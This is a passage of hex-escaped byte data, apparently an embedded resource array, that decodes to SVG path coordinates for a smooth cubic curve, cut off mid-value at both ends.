\x37\x31\x37\x34\x39\x20\x43\x20\x32\x2e\x39\x39\x37\x37\x38\x33\
\x34\x30\x37\x39\x31\x20\x39\x2e\x33\x32\x31\x36\x34\x31\x33\x37\
\x32\x36\x20\x33\x2e\x30\x30\x34\x30\x32\x34\x34\x37\x36\x37\x35\
\x20\x39\x2e\x33\x34\x31\x37\x30\x38\x33\x37\x38\x20\x33\x2e\x30\
\x31\x30\x32\x36\x35\x35\x34\x35\x35\x38\x20\x39\x2e\x33\x36\x32\
\x34\x39\x31\x38\x36\x38\x38\x31\x20\x43\x20\x33\x2e\x30\x31\x36\
\x35\x30\x36\x36\x31\x34\x34\x32\x20\x39\x2e\x33\x38\x33\x32\x37\
\x35\x33\x35\x39\x36\x32\x20\x33\x2e\x30\x32\x32\x37\x34\x37\x36\
\x38\x33\x32\x35\x20\x39\x2e\x34\x30\x34\x37\x37\x39\x36\x34\x34\
\x34\x38\x20\x33\x2e\x30\x32\x38\x39\x38\x38\x37\x35\x32\x30\x39\
\x20\x39\x2e\x34\x32\x36\x39\x38\x33\x38\x34\x34\x31\x20\x43\x20\
\x33\x2e\x30\x33\x35\x32\x32\x39\x38\x32\x30\x39\x33\x20\x39\x2e\
\x34\x34\x39\x31\x38\x38\x30\x34\x33\x37\x33\x20\x33\x2e\x30\x34\
\x31\x34\x37\x30\x38\x38\x39\x37\x36\x20\x39\x2e\x34\x37\x32\x30\
\x39\x36\x33\x36\x36\x39\x37\x20\x33\x2e\x30\x34\x37\x37\x31\x31\
\x39\x35\x38\x36\x20\x39\x2e\x34\x39\x35\x36\x38\x36\x39\x35\x32\
\x33\x39\x20\x43\x20\x33\x2e\x30\x35\x33\x39\x35\x33\x30\x32\x37\
\x34\x33\x20\x39\x2e\x35\x31\x39\x32\x37\x37\x35\x33\x37\x38\x32\
\x20\x33\x2e\x30\x36\x30\x31\x39\x34\x30\x39\x36\x32\x37\x20\x39\
\x2e\x35\x34\x33\x35\x35\x34\x34\x38\x37\x39\x39\x20\x33\x2e\x30\
\x36\x36\x34\x33\x35\x31\x36\x35\x31\x31\x20\x39\x2e\x35\x36\x38\
\x34\x39\x34\x39\x39\x33\x31\x36\x20\x43\x20\x33\x2e\x30\x37\x32\
\x36\x37\x36\x32\x33\x33\x39\x34\x20\x39\x2e\x35\x39\x33\x34\x33\
\x35\x34\x39\x38\x33\x32\x20\x33\x2e\x30\x37\x38\x39\x31\x37\x33\
\x30\x32\x37\x38\x20\x39\x2e\x36\x31\x39\x30\x34\x33\x35\x34\x38\
\x33\x39\x20\x33\x2e\x30\x38\x35\x31\x35\x38\x33\x37\x31\x36\x31\
\x20\x39\x2e\x36\x34\x35\x32\x39\x35\x34\x32\x30\x35\x32\x20\x43\
\x20\x33\x2e\x30\x39\x31\x33\x39\x39\x34\x34\x30\x34\x35\x20\x39\
\x2e\x36\x37\x31\x35\x34\x37\x32\x39\x32\x36\x35\x20\x33\x2e\x30\
\x39\x37\x36\x34\x30\x35\x30\x39\x32\x39\x20\x39\x2e\x36\x39\x38\
\x34\x34\x36\x38\x35\x37\x39\x37\x20\x33\x2e\x31\x30\x33\x38\x38\
\x31\x35\x37\x38\x31\x32\x20\x39\x2e\x37\x32\x35\x39\x36\x39\x35\
\x31\x37\x32\x32\x20\x43\x20\x33\x2e\x31\x31\x30\x31\x32\x32\x36\
\x34\x36\x39\x36\x20\x39\x2e\x37\x35\x33\x34\x39\x32\x31\x37\x36\
\x34\x37\x20\x33\x2e\x31\x31\x36\x33\x36\x33\x37\x31\x35\x37\x39\
\x20\x39\x2e\x37\x38\x31\x36\x34\x31\x36\x37\x35\x39\x39\x20\x33\
\x2e\x31\x32\x32\x36\x30\x34\x37\x38\x34\x36\x33\x20\x39\x2e\x38\
\x31\x30\x33\x39\x32\x35\x37\x38\x31\x33\x20\x43\x20\x33\x2e\x31\
\x32\x38\x38\x34\x35\x38\x35\x33\x34\x37\x20\x39\x2e\x38\x33\x39\
\x31\x34\x33\x34\x38\x30\x32\x37\x20\x33\x2e\x31\x33\x35\x30\x38\
\x36\x39\x32\x32\x33\x20\x39\x2e\x38\x36\x38\x34\x39\x39\x34\x30\
\x30\x37\x39\x20\x33\x2e\x31\x34\x31\x33\x32\x37\x39\x39\x31\x31\
\x34\x20\x39\x2e\x38\x39\x38\x34\x33\x34\x31\x30\x32\x39\x39\x20\
\x43\x20\x33\x2e\x31\x34\x37\x35\x36\x39\x30\x35\x39\x39\x37\x20\
\x39\x2e\x39\x32\x38\x33\x36\x38\x38\x30\x35\x31\x39\x20\x33\x2e\
\x31\x35\x33\x38\x31\x30\x31\x32\x38\x38\x31\x20\x39\x2e\x39\x35\
\x38\x38\x38\x35\x37\x36\x38\x36\x36\x20\x33\x2e\x31\x36\x30\x30\
\x35\x31\x31\x39\x37\x36\x35\x20\x39\x2e\x39\x38\x39\x39\x35\x37\
\x39\x39\x38\x31\x38\x20\x43\x20\x33\x2e\x31\x36\x36\x32\x39\x32\
\x32\x36\x36\x34\x38\x20\x31\x30\x2e\x30\x32\x31\x30\x33\x30\x32\
\x32\x37\x37\x20\x33\x2e\x31\x37\x32\x35\x33\x33\x33\x33\x35\x33\
\x32\x20\x31\x30\x2e\x30\x35\x32\x36\x36\x31\x30\x36\x31\x33\x20\
\x33\x2e\x31\x37\x38\x37\x37\x34\x34\x30\x34\x31\x36\x20\x31\x30\
\x2e\x30\x38\x34\x38\x32\x32\x37\x38\x37\x31\x20\x43\x20\x33\x2e\
\x31\x38\x35\x30\x31\x35\x34\x37\x32\x39\x39\x20\x31\x30\x2e\x31\
\x31\x36\x39\x38\x34\x35\x31\x32\x38\x20\x33\x2e\x31\x39\x31\x32\
\x35\x36\x35\x34\x31\x38\x33\x20\x31\x30\x2e\x31\x34\x39\x36\x38\
\x30\x33\x32\x32\x20\x33\x2e\x31\x39\x37\x34\x39\x37\x36\x31\x30\
\x36\x36\x20\x31\x30\x2e\x31\x38\x32\x38\x38\x31\x38\x32\x38\x37\
\x20\x43\x20\x33\x2e\x32\x30\x33\x37\x33\x38\x36\x37\x39\x35\x20\
\x31\x30\x2e\x32\x31\x36\x30\x38\x33\x33\x33\x35\x34\x20\x33\x2e\
\x32\x30\x39\x39\x37\x39\x37\x34\x38\x33\x34\x20\x31\x30\x2e\x32\
\x34\x39\x37\x39\x33\x35\x37\x39\x33\x20\x33\x2e\x32\x31\x36\x32\
\x32\x30\x38\x31\x37\x31\x37\x20\x31\x30\x2e\x32\x38\x33\x39\x38\
\x33\x35\x34\x34\x34\x20\x43\x20\x33\x2e\x32\x32\x32\x34\x36\x31\
\x38\x38\x36\x30\x31\x20\x31\x30\x2e\x33\x31\x38\x31\x37\x33\x35\
\x30\x39\x36\x20\x33\x2e\x32\x32\x38\x37\x30\x32\x39\x35\x34\x38\
\x34\x20\x31\x30\x2e\x33\x35\x32\x38\x34\x36\x30\x37\x39\x33\x20\
\x33\x2e\x32\x33\x34\x39\x34\x34\x30\x32\x33\x36\x38\x20\x31\x30\
\x2e\x33\x38\x37\x39\x37\x31\x36\x35\x32\x34\x20\x43\x20\x33\x2e\
\x32\x34\x31\x31\x38\x35\x30\x39\x32\x35\x32\x20\x31\x30\x2e\x34\
\x32\x33\x30\x39\x37\x32\x32\x35\x35\x20\x33\x2e\x32\x34\x37\x34\
\x32\x36\x31\x36\x31\x33\x35\x20\x31\x30\x2e\x34\x35\x38\x36\x37\
\x38\x35\x32\x34\x36\x20\x33\x2e\x32\x35\x33\x36\x36\x37\x32\x33\
\x30\x31\x39\x20\x31\x30\x2e\x34\x39\x34\x36\x38\x35\x34\x30\x38\
\x39\x20\x43\x20\x33\x2e\x32\x35\x39\x39\x30\x38\x32\x39\x39\x30\
\x32\x20\x31\x30\x2e\x35\x33\x30\x36\x39\x32\x32\x39\x33\x33\x20\
\x33\x2e\x32\x36\x36\x31\x34\x39\x33\x36\x37\x38\x36\x20\x31\x30\
\x2e\x35\x36\x37\x31\x32\x37\x33\x32\x30\x34\x20\x33\x2e\x32\x37\
\x32\x33\x39\x30\x34\x33\x36\x37\x20\x31\x30\x2e\x36\x30\x33\x39\
\x35\x39\x38\x35\x37\x20\x43\x20\x33\x2e\x32\x37\x38\x36\x33\x31\
\x35\x30\x35\x35\x33\x20\x31\x30\x2e\x36\x34\x30\x37\x39\x32\x33\
\x39\x33\x35\x20\x33\x2e\x32\x38\x34\x38\x37\x32\x35\x37\x34\x33\
\x37\x20\x31\x30\x2e\x36\x37\x38\x30\x32\x34\x38\x32\x38\x20\x33\
\x2e\x32\x39\x31\x31\x31\x33\x36\x34\x33\x32\x20\x31\x30\x2e\x37\
\x31\x35\x36\x32\x36\x30\x38\x31\x34\x20\x43\x20\x33\x2e\x32\x39\
\x37\x33\x35\x34\x37\x31\x32\x30\x34\x20\x31\x30\x2e\x37\x35\x33\
\x32\x32\x37\x33\x33\x34\x38\x20\x33\x2e\x33\x30\x33\x35\x39\x35\
\x37\x38\x30\x38\x38\x20\x31\x30\x2e\x37\x39\x31\x31\x39\x39\x36\
\x32\x33\x20\x33\x2e\x33\x30\x39\x38\x33\x36\x38\x34\x39\x37\x31\
\x20\x31\x30\x2e\x38\x32\x39\x35\x31\x31\x34\x36\x39\x37\x20\x43\
\x20\x33\x2e\x33\x31\x36\x30\x37\x37\x39\x31\x38\x35\x35\x20\x31\
\x30\x2e\x38\x36\x37\x38\x32\x33\x33\x31\x36\x33\x20\x33\x2e\x33\
\x32\x32\x33\x31\x38\x39\x38\x37\x33\x38\x20\x31\x30\x2e\x39\x30\
\x36\x34\x37\x36\x37\x36\x31\x32\x20\x33\x2e\x33\x32\x38\x35\x36\
\x30\x30\x35\x36\x32\x32\x20\x31\x30\x2e\x39\x34\x35\x34\x33\x39\
\x39\x37\x39\x31\x20\x43\x20\x33\x2e\x33\x33\x34\x38\x30\x31\x31\
\x32\x35\x30\x36\x20\x31\x30\x2e\x39\x38\x34\x34\x30\x33\x31\x39\
\x36\x39\x20\x33\x2e\x33\x34\x31\x30\x34\x32\x31\x39\x33\x38\x39\
\x20\x31\x31\x2e\x30\x32\x33\x36\x37\x38\x30\x34\x38\x34\x20\x33\
\x2e\x33\x34\x37\x32\x38\x33\x32\x36\x32\x37\x33\x20\x31\x31\x2e\
\x30\x36\x33\x32\x33\x32\x34\x30\x38\x35\x20\x43\x20\x33\x2e\x33\
\x35\x33\x35\x32\x34\x33\x33\x31\x35\x36\x20\x31\x31\x2e\x31\x30\
\x32\x37\x38\x36\x37\x36\x38\x37\x20\x33\x2e\x33\x35\x39\x37\x36\
\x35\x34\x30\x30\x34\x20\x31\x31\x2e\x31\x34\x32\x36\x32\x32\x33\
\x31\x36\x31\x20\x33\x2e\x33\x36\x36\x30\x30\x36\x34\x36\x39\x32\
\x34\x20\x31\x31\x2e\x31\x38\x32\x37\x30\x36\x36\x37\x35\x38\x20\
\x43\x20\x33\x2e\x33\x37\x32\x32\x34\x37\x35\x33\x38\x30\x37\x20\
\x31\x31\x2e\x32\x32\x32\x37\x39\x31\x30\x33\x35\x36\x20\x33\x2e\
\x33\x37\x38\x34\x38\x38\x36\x30\x36\x39\x31\x20\x31\x31\x2e\x32\
\x36\x33\x31\x32\x35\x37\x30\x31\x35\x20\x33\x2e\x33\x38\x34\x37\
\x32\x39\x36\x37\x35\x37\x34\x20\x31\x31\x2e\x33\x30\x33\x36\x37\
\x38\x30\x39\x38\x39\x20\x43\x20\x33\x2e\x33\x39\x30\x39\x37\x30\
\x37\x34\x34\x35\x38\x20\x31\x31\x2e\x33\x34\x34\x32\x33\x30\x34\
\x39\x36\x33\x20\x33\x2e\x33\x39\x37\x32\x31\x31\x38\x31\x33\x34\
\x32\x20\x31\x31\x2e\x33\x38\x35\x30\x30\x31\x39\x33\x32\x20\x33\
\x2e\x34\x30\x33\x34\x35\x32\x38\x38\x32\x32\x35\x20\x31\x31\x2e\
\x34\x32\x35\x39\x35\x39\x36\x38\x31\x35\x20\x43\x20\x33\x2e\x34\
\x30\x39\x36\x39\x33\x39\x35\x31\x30\x39\x20\x31\x31\x2e\x34\x36\
\x36\x39\x31\x37\x34\x33\x31\x31\x20\x33\x2e\x34\x31\x35\x39\x33\
\x35\x30\x31\x39\x39\x32\x20\x31\x31\x2e\x35\x30\x38\x30\x36\x32\
\x36\x31\x32\x34\x20\x33\x2e\x34\x32\x32\x31\x37\x36\x30\x38\x38\
\x37\x36\x20\x31\x31\x2e\x35\x34\x39\x33\x36\x32\x34\x30\x32\x31\
\x20\x43\x20\x33\x2e\x34\x32\x38\x34\x31\x37\x31\x35\x37\x36\x20\
\x31\x31\x2e\x35\x39\x30\x36\x36\x32\x31\x39\x31\x38\x20\x33\x2e\
\x34\x33\x34\x36\x35\x38\x32\x32\x36\x34\x33\x20\x31\x31\x2e\x36\
\x33\x32\x31\x31\x37\x35\x31\x37\x20\x33\x2e\x34\x34\x30\x38\x39\
\x39\x32\x39\x35\x32\x37\x20\x31\x31\x2e\x36\x37\x33\x36\x39\x35\
\x35\x30\x36\x31\x20\x43\x20\x33\x2e\x34\x34\x37\x31\x34\x30\x33\
\x36\x34\x31\x31\x20\x31\x31\x2e\x37\x31\x35\x32\x37\x33\x34\x39\
\x35\x32\x20\x33\x2e\x34\x35\x33\x33\x38\x31\x34\x33\x32\x39\x34\
\x20\x31\x31\x2e\x37\x35\x36\x39\x37\x34\x38\x38\x33\x20\x33\x2e\
\x34\x35\x39\x36\x32\x32\x35\x30\x31\x37\x38\x20\x31\x31\x2e\x37\
\x39\x38\x37\x36\x36\x38\x30\x30\x37\x20\x43\x20\x33\x2e\x34\x36\
\x35\x38\x36\x33\x35\x37\x30\x36\x31\x20\x31\x31\x2e\x38\x34\x30\
\x35\x35\x38\x37\x31\x38\x34\x20\x33\x2e\x34\x37\x32\x31\x30\x34\
\x36\x33\x39\x34\x35\x20\x31\x31\x2e\x38\x38\x32\x34\x34\x31\x37\
\x30\x37\x34\x20\x33\x2e\x34\x37\x38\x33\x34\x35\x37\x30\x38\x32\
\x39\x20\x31\x31\x2e\x39\x32\x34\x33\x38\x32\x39\x35\x32\x31\x20\
\x43\x20\x33\x2e\x34\x38\x34\x35\x38\x36\x37\x37\x37\x31\x32\x20\
\x31\x31\x2e\x39\x36\x36\x33\x32\x34\x31\x39\x36\x39\x20\x33\x2e\
\x34\x39\x30\x38\x32\x37\x38\x34\x35\x39\x36\x20\x31\x32\x2e\x30\
\x30\x38\x33\x32\x34\x30\x34\x34\x37\x20\x33\x2e\x34\x39\x37\x30\
\x36\x38\x39\x31\x34\x37\x39\x20\x31\x32\x2e\x30\x35\x30\x33\x34\
\x39\x37\x38\x34\x32\x20\x43\x20\x33\x2e\x35\x30\x33\x33\x30\x39\
\x39\x38\x33\x36\x33\x20\x31\x32\x2e\x30\x39\x32\x33\x37\x35\x35\
\x32\x33\x38\x20\x33\x2e\x35\x30\x39\x35\x35\x31\x30\x35\x32\x34\
\x37\x20\x31\x32\x2e\x31\x33\x34\x34\x32\x37\x33\x30\x37\x36\x20\
\x33\x2e\x35\x31\x35\x37\x39\x32\x31\x32\x31\x33\x20\x31\x32\x2e\
\x31\x37\x36\x34\x37\x32\x35\x37\x38\x39\x20\x43\x20\x33\x2e\x35\
\x32\x32\x30\x33\x33\x31\x39\x30\x31\x34\x20\x31\x32\x2e\x32\x31\
\x38\x35\x31\x37\x38\x35\x30\x33\x20\x33\x2e\x35\x32\x38\x32\x37\
\x34\x32\x35\x38\x39\x37\x20\x31\x32\x2e\x32\x36\x30\x35\x35\x36\
\x35\x36\x36\x39\x20\x33\x2e\x35\x33\x34\x35\x31\x35\x33\x32\x37\
\x38\x31\x20\x31\x32\x2e\x33\x30\x32\x35\x35\x36\x33\x37\x37\x20\
\x43\x20\x33\x2e\x35\x34\x30\x37\x35\x36\x33\x39\x36\x36\x35\x20\
\x31\x32\x2e\x33\x34\x34\x35\x35\x36\x31\x38\x37\x20\x33\x2e\x35\
\x34\x36\x39\x39\x37\x34\x36\x35\x34\x38\x20\x31\x32\x2e\x33\x38\
\x36\x35\x31\x36\x38\x35\x33\x34\x20\x33\x2e\x35\x35\x33\x32\x33\
\x38\x35\x33\x34\x33\x32\x20\x31\x32\x2e\x34\x32\x38\x34\x30\x36\
\x32\x37\x39\x34\x20\x43\x20\x33\x2e\x35\x35\x39\x34\x37\x39\x36\
\x30\x33\x31\x35\x20\x31\x32\x2e\x34\x37\x30\x32\x39\x35\x37\x30\
\x35\x33\x20\x33\x2e\x35\x36\x35\x37\x32\x30\x36\x37\x31\x39\x39\
\x20\x31\x32\x2e\x35\x31\x32\x31\x31\x33\x34\x35\x39\x31\x20\x33\
\x2e\x35\x37\x31\x39\x36\x31\x37\x34\x30\x38\x33\x20\x31\x32\x2e\
\x35\x35\x33\x38\x32\x37\x37\x34\x38\x37\x20\x43\x20\x33\x2e\x35\
\x37\x38\x32\x30\x32\x38\x30\x39\x36\x36\x20\x31\x32\x2e\x35\x39\
\x35\x35\x34\x32\x30\x33\x38\x33\x20\x33\x2e\x35\x38\x34\x34\x34\
\x33\x38\x37\x38\x35\x20\x31\x32\x2e\x36\x33\x37\x31\x35\x32\x32\
\x33\x38\x32\x20\x33\x2e\x35\x39\x30\x36\x38\x34\x39\x34\x37\x33\
\x33\x20\x31\x32\x2e\x36\x37\x38\x36\x32\x36\x39\x30\x39\x39\x20\
\x43\x20\x33\x2e\x35\x39\x36\x39\x32\x36\x30\x31\x36\x31\x37\x20\
\x31\x32\x2e\x37\x32\x30\x31\x30\x31\x35\x38\x31\x37\x20\x33\x2e\
\x36\x30\x33\x31\x36\x37\x30\x38\x35\x30\x31\x20\x31\x32\x2e\x37\
\x36\x31\x34\x33\x39\x39\x30\x37\x20\x33\x2e\x36\x30\x39\x34\x30\
\x38\x31\x35\x33\x38\x34\x20\x31\x32\x2e\x38\x30\x32\x36\x31\x30\
\x38\x34\x39\x38\x20\x43\x20\x33\x2e\x36\x31\x35\x36\x34\x39\x32\
\x32\x32\x36\x38\x20\x31\x32\x2e\x38\x34\x33\x37\x38\x31\x37\x39\
\x32\x36\x20\x33\x2e\x36\x32\x31\x38\x39\x30\x32\x39\x31\x35\x31\
\x20\x31\x32\x2e\x38\x38\x34\x37\x38\x34\x33\x34\x33\x20\x33\x2e\
\x36\x32\x38\x31\x33\x31\x33\x36\x30\x33\x35\x20\x31\x32\x2e\x39\
\x32\x35\x35\x38\x37\x39\x31\x35\x32\x20\x43\x20\x33\x2e\x36\x33\
\x34\x33\x37\x32\x34\x32\x39\x31\x39\x20\x31\x32\x2e\x39\x36\x36\
\x33\x39\x31\x34\x38\x37\x35\x20\x33\x2e\x36\x34\x30\x36\x31\x33\
\x34\x39\x38\x30\x32\x20\x31\x33\x2e\x30\x30\x36\x39\x39\x34\x38\
\x38\x31\x37\x20\x33\x2e\x36\x34\x36\x38\x35\x34\x35\x36\x36\x38\
\x36\x20\x31\x33\x2e\x30\x34\x37\x33\x36\x38\x30\x30\x39\x37\x20\
\x43\x20\x33\x2e\x36\x35\x33\x30\x39\x35\x36\x33\x35\x36\x39\x20\
\x31\x33\x2e\x30\x38\x37\x37\x34\x31\x31\x33\x37\x38\x20\x33\x2e\
\x36\x35\x39\x33\x33\x36\x37\x30\x34\x35\x33\x20\x31\x33\x2e\x31\
\x32\x37\x38\x38\x32\x36\x31\x31\x35\x20\x33\x2e\x36\x36\x35\x35\
\x37\x37\x37\x37\x33\x33\x37\x20\x31\x33\x2e\x31\x36\x37\x37\x36\
\x32\x38\x38\x36\x39\x20\x43\x20\x33\x2e\x36\x37\x31\x38\x31\x38\
\x38\x34\x32\x32\x20\x31\x33\x2e\x32\x30\x37\x36\x34\x33\x31\x36\
\x32\x34\x20\x33\x2e\x36\x37\x38\x30\x35\x39\x39\x31\x31\x30\x34\
\x20\x31\x33\x2e\x32\x34\x37\x32\x36\x30\x36\x36\x35\x33\x20\x33\
\x2e\x36\x38\x34\x33\x30\x30\x39\x37\x39\x38\x37\x20\x31\x33\x2e\
\x32\x38\x36\x35\x38\x36\x34\x34\x31\x37\x20\x43\x20\x33\x2e\x36\
\x39\x30\x35\x34\x32\x30\x34\x38\x37\x31\x20\x31\x33\x2e\x33\x32\
\x35\x39\x31\x32\x32\x31\x38\x31\x20\x33\x2e\x36\x39\x36\x37\x38\
\x33\x31\x31\x37\x35\x35\x20\x31\x33\x2e\x33\x36\x34\x39\x34\x34\
\x35\x31\x20\x33\x2e\x37\x30\x33\x30\x32\x34\x31\x38\x36\x33\x38\
\x20\x31\x33\x2e\x34\x30\x33\x36\x35\x34\x39\x39\x37\x39\x20\x43\
\x20\x33\x2e\x37\x30\x39\x32\x36\x35\x32\x35\x35\x32\x32\x20\x31\
\x33\x2e\x34\x34\x32\x33\x36\x35\x34\x38\x35\x38\x20\x33\x2e\x37\
\x31\x35\x35\x30\x36\x33\x32\x34\x30\x36\x20\x31\x33\x2e\x34\x38\
\x30\x37\x35\x32\x32\x33\x31\x20\x33\x2e\x37\x32\x31\x37\x34\x37\
\x33\x39\x32\x38\x39\x20\x31\x33\x2e\x35\x31\x38\x37\x38\x37\x35\
\x39\x32\x33\x20\x43\x20\x33\x2e\x37\x32\x37\x39\x38\x38\x34\x36\
\x31\x37\x33\x20\x31\x33\x2e\x35\x35\x36\x38\x32\x32\x39\x35\x33\
\x35\x20\x33\x2e\x37\x33\x34\x32\x32\x39\x35\x33\x30\x35\x36\x20\
\x31\x33\x2e\x35\x39\x34\x35\x30\x34\x38\x31\x34\x32\x20\x33\x2e\
\x37\x34\x30\x34\x37\x30\x35\x39\x39\x34\x20\x31\x33\x2e\x36\x33\
\x31\x38\x30\x36\x32\x35\x34\x31\x20\x43\x20\x33\x2e\x37\x34\x36\
\x37\x31\x31\x36\x36\x38\x32\x34\x20\x31\x33\x2e\x36\x36\x39\x31\
\x30\x37\x36\x39\x34\x20\x33\x2e\x37\x35\x32\x39\x35\x32\x37\x33\
\x37\x30\x37\x20\x31\x33\x2e\x37\x30\x36\x30\x32\x36\x34\x32\x31\
\x39\x20\x33\x2e\x37\x35\x39\x31\x39\x33\x38\x30\x35\x39\x31\x20\
\x31\x33\x2e\x37\x34\x32\x35\x33\x36\x32\x38\x30\x33\x20\x43\x20\
\x33\x2e\x37\x36\x35\x34\x33\x34\x38\x37\x34\x37\x34\x20\x31\x33\
\x2e\x37\x37\x39\x30\x34\x36\x31\x33\x38\x37\x20\x33\x2e\x37\x37\
\x31\x36\x37\x35\x39\x34\x33\x35\x38\x20\x31\x33\x2e\x38\x31\x35\
\x31\x34\x34\x36\x36\x35\x33\x20\x33\x2e\x37\x37\x37\x39\x31\x37\
\x30\x31\x32\x34\x32\x20\x31\x33\x2e\x38\x35\x30\x38\x30\x36\x35\
\x30\x35\x37\x20\x43\x20\x33\x2e\x37\x38\x34\x31\x35\x38\x30\x38\
\x31\x32\x35\x20\x31\x33\x2e\x38\x38\x36\x34\x36\x38\x33\x34\x36\
\x31\x20\x33\x2e\x37\x39\x30\x33\x39\x39\x31\x35\x30\x30\x39\x20\
\x31\x33\x2e\x39\x32\x31\x36\x39\x30\x38\x37\x30\x37\x20\x33\x2e\
\x37\x39\x36\x36\x34\x30\x32\x31\x38\x39\x32\x20\x31\x33\x2e\x39\
\x35\x36\x34\x34\x39\x35\x36\x37\x33\x20\x43\x20\x33\x2e\x38\x30\
\x32\x38\x38\x31\x32\x38\x37\x37\x36\x20\x31\x33\x2e\x39\x39\x31\
\x32\x30\x38\x32\x36\x34\x20\x33\x2e\x38\x30\x39\x31\x32\x32\x33\
\x35\x36\x36\x20\x31\x34\x2e\x30\x32\x35\x35\x30\x30\x33\x33\x39\
\x39\x20\x33\x2e\x38\x31\x35\x33\x36\x33\x34\x32\x35\x34\x33\x20\
\x31\x34\x2e\x30\x35\x39\x33\x30\x32\x31\x36\x33\x33\x20\x43\x20\
\x33\x2e\x38\x32\x31\x36\x30\x34\x34\x39\x34\x32\x37\x20\x31\x34\
\x2e\x30\x39\x33\x31\x30\x33\x39\x38\x36\x36\x20\x33\x2e\x38\x32\
\x37\x38\x34\x35\x35\x36\x33\x31\x20\x31\x34\x2e\x31\x32\x36\x34\
\x31\x32\x36\x30\x35\x36\x20\x33\x2e\x38\x33\x34\x30\x38\x36\x36\
\x33\x31\x39\x34\x20\x31\x34\x2e\x31\x35\x39\x32\x30\x35\x33\x30\
\x35\x32\x20\x43\x20\x33\x2e\x38\x34\x30\x33\x32\x37\x37\x30\x30\
\x37\x38\x20\x31\x34\x2e\x31\x39\x31\x39\x39\x38\x30\x30\x34\x37\
\x20\x33\x2e\x38\x34\x36\x35\x36\x38\x37\x36\x39\x36\x31\x20\x31\
\x34\x2e\x32\x32\x34\x32\x37\x31\x36\x37\x38\x37\x20\x33\x2e\x38\
\x35\x32\x38\x30\x39\x38\x33\x38\x34\x35\x20\x31\x34\x2e\x32\x35\
\x36\x30\x30\x34\x35\x36\x33\x38\x20\x43\x20\x33\x2e\x38\x35\x39\
\x30\x35\x30\x39\x30\x37\x32\x38\x20\x31\x34\x2e\x32\x38\x37\x37\
\x33\x37\x34\x34\x38\x39\x20\x33\x2e\x38\x36\x35\x32\x39\x31\x39\
\x37\x36\x31\x32\x20\x31\x34\x2e\x33\x31\x38\x39\x32\x36\x32\x38\
\x39\x36\x20\x33\x2e\x38\x37\x31\x35\x33\x33\x30\x34\x34\x39\x36\
\x20\x31\x34\x2e\x33\x34\x39\x35\x35\x30\x33\x30\x37\x39\x20\x43\
\x20\x33\x2e\x38\x37\x37\x37\x37\x34\x31\x31\x33\x37\x39\x20\x31\
\x34\x2e\x33\x38\x30\x31\x37\x34\x33\x32\x36\x32\x20\x33\x2e\x38\
\x38\x34\x30\x31\x35\x31\x38\x32\x36\x33\x20\x31\x34\x2e\x34\x31\
\x30\x32\x33\x30\x31\x32\x32\x32\x20\x33\x2e\x38\x39\x30\x32\x35\
\x36\x32\x35\x31\x34\x36\x20\x31\x34\x2e\x34\x33\x39\x36\x39\x37\
\x39\x33\x35\x35\x20\x43\x20\x33\x2e\x38\x39\x36\x34\x39\x37\x33\
\x32\x30\x33\x20\x31\x34\x2e\x34\x36\x39\x31\x36\x35\x37\x34\x38\
\x38\x20\x33\x2e\x39\x30\x32\x37\x33\x38\x33\x38\x39\x31\x34\x20\
\x31\x34\x2e\x34\x39\x38\x30\x34\x32\x30\x34\x30\x32\x20\x33\x2e\
\x39\x30\x38\x39\x37\x39\x34\x35\x37\x39\x37\x20\x31\x34\x2e\x35\
\x32\x36\x33\x30\x38\x30\x39\x37\x34\x20\x43\x20\x33\x2e\x39\x31\
\x35\x32\x32\x30\x35\x32\x36\x38\x31\x20\x31\x34\x2e\x35\x35\x34\
\x35\x37\x34\x31\x35\x34\x37\x20\x33\x2e\x39\x32\x31\x34\x36\x31\
\x35\x39\x35\x36\x34\x20\x31\x34\x2e\x35\x38\x32\x32\x32\x36\x33\
\x30\x34\x37\x20\x33\x2e\x39\x32\x37\x37\x30\x32\x36\x36\x34\x34\
\x38\x20\x31\x34\x2e\x36\x30\x39\x32\x34\x36\x39\x31\x32\x36\x20\
\x43\x20\x33\x2e\x39\x33\x33\x39\x34\x33\x37\x33\x33\x33\x32\x20\
\x31\x34\x2e\x36\x33\x36\x32\x36\x37\x35\x32\x30\x34\x20\x33\x2e\
\x39\x34\x30\x31\x38\x34\x38\x30\x32\x31\x35\x20\x31\x34\x2e\x36\
\x36\x32\x36\x35\x32\x37\x38\x34\x38\x20\x33\x2e\x39\x34\x36\x34\
\x32\x35\x38\x37\x30\x39\x39\x20\x31\x34\x2e\x36\x38\x38\x33\x38\
\x36\x31\x37\x35\x31\x20\x43\x20\x33\x2e\x39\x35\x32\x36\x36\x36\
\x39\x33\x39\x38\x32\x20\x31\x34\x2e\x37\x31\x34\x31\x31\x39\x35\
\x36\x35\x33\x20\x33\x2e\x39\x35\x38\x39\x30\x38\x30\x30\x38\x36\
\x36\x20\x31\x34\x2e\x37\x33\x39\x31\x39\x37\x31\x35\x38\x20\x33\
\x2e\x39\x36\x35\x31\x34\x39\x30\x37\x37\x35\x20\x31\x34\x2e\x37\
\x36\x33\x36\x30\x33\x35\x35\x32\x33\x20\x43\x20\x33\x2e\x39\x37\
\x31\x33\x39\x30\x31\x34\x36\x33\x33\x20\x31\x34\x2e\x37\x38\x38\
\x30\x30\x39\x39\x34\x36\x35\x20\x33\x2e\x39\x37\x37\x36\x33\x31\
\x32\x31\x35\x31\x37\x20\x31\x34\x2e\x38\x31\x31\x37\x34\x31\x31\
\x30\x32\x38\x20\x33\x2e\x39\x38\x33\x38\x37\x32\x32\x38\x34\x30\
\x31\x20\x31\x34\x2e\x38\x33\x34\x37\x38\x32\x37\x37\x34\x20\x43\
\x20\x33\x2e\x39\x39\x30\x31\x31\x33\x33\x35\x32\x38\x34\x20\x31\
\x34\x2e\x38\x35\x37\x38\x32\x34\x34\x34\x35\x32\x20\x33\x2e\x39\
\x39\x36\x33\x35\x34\x34\x32\x31\x36\x38\x20\x31\x34\x2e\x38\x38\
\x30\x31\x37\x32\x34\x38\x31\x37\x20\x34\x2e\x30\x30\x32\x35\x39\
\x35\x34\x39\x30\x35\x31\x20\x31\x34\x2e\x39\x30\x31\x38\x31\x33\
\x38\x31\x32\x32\x20\x43\x20\x34\x2e\x30\x30\x38\x38\x33\x36\x35\
\x35\x39\x33\x35\x20\x31\x34\x2e\x39\x32\x33\x34\x35\x35\x31\x34\
\x32\x37\x20\x34\x2e\x30\x31\x35\x30\x37\x37\x36\x32\x38\x31\x39\
\x20\x31\x34\x2e\x39\x34\x34\x33\x38\x35\x35\x31\x34\x31\x20\x34\
\x2e\x30\x32\x31\x33\x31\x38\x36\x39\x37\x30\x32\x20\x31\x34\x2e\
